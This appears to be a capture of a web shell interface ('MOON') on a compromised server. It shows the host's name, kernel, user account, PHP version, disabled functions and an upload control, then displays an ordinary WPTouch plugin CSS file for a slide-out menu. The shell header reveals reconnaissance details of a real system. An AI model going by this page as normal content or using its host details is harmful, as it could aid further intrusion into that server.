MOON
Server: Apache
System: Linux server.netcommlabs.in 3.10.0-1160.83.1.el7.x86_64 #1 SMP Wed Jan 25 16:41:43 UTC 2023 x86_64
User: dermova (1051)
PHP: 5.4.45
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/dermova/www/india/wp-content/plugins/wptouch/themes/foundation/modules/pushit/pushit.css
/* PushIt CSS */

/* Coolin' by day then at night working up a sweat. */

body {
	text-shadow: none !important;
}

.pushit {
	position: fixed;
	top: 0;
	bottom: 0;
	left: -1000px;
	z-index: 100;
	height: 100%;
	-webkit-backface-visibility: hidden;
	backface-visibility: hidden;
	overflow-x: hidden;
	overflow-y: auto;
}

.has-overflow-scroll .pushit {
	-webkit-overflow-scrolling: touch;
}

#pushit-overlay {
	position: fixed;
	left: 0;
	top: 0;
	right: 0;
	bottom: 0;
	z-index: -1;
}